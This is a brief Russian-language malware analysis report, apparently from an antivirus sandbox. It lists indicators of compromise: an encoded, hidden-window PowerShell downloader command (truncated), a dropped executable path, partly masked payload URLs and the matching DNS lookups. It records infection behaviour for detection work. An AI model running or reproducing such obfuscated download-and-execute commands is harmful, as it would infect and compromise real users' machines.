Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAHQAYwB6AHYAdwAyAD0AKAAoACcASABkAHYANgAnACsAJwB1ACcAKQArACcAZQAwACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAVQBTAEUAUgBwAHIAbwBGAGkAbABlAFwAaQBwAEEAVQBEAG...
- %HOMEPATH%\ipaudeo\k_j9atr\siydwd.exe
- %HOMEPATH%\ipaudeo\k_j9atr\siydwd.exe
- %HOMEPATH%\ipaudeo\k_j9atr\siydwd.exe
- http://zh###yasoft.ir/wp-content/file/ANEbg/
- http://zh###yasoft.ir/cgi-sys/suspendedpage.cgi
- http://vi####blends.com/images/attach/nGKW/
- http://da###tim.com.br/rss/public/4xxkqIh/
- http://ea####nnovation.org/gcfimpact/public/sXzPpHP/
- http://pc####gns4you.com/wp-admin/public/eo8UUYeCUKx/
- http://www.we###bor.com.br/avisos/24206240720/
- http://pe###guinle.com/Tijuca-project/WAQgDjW/
- DNS ASK zh###yasoft.ir
- DNS ASK vi####blends.com
- DNS ASK da###tim.com.br
- DNS ASK ea####nnovation.org
- DNS ASK pc####gns4you.com
- DNS ASK we###bor.com.br
- DNS ASK pe###guinle.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAHQAYwB6AHYAdwAyAD0AKAAoACcASABkAHYANgAnACsAJwB1ACcAKQArACcAZQAwACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAVQBTAEUAUgBwAHIAbwBGAGkAbABlAFwAaQBwAEEAVQBEAG...' (со скрытым окном)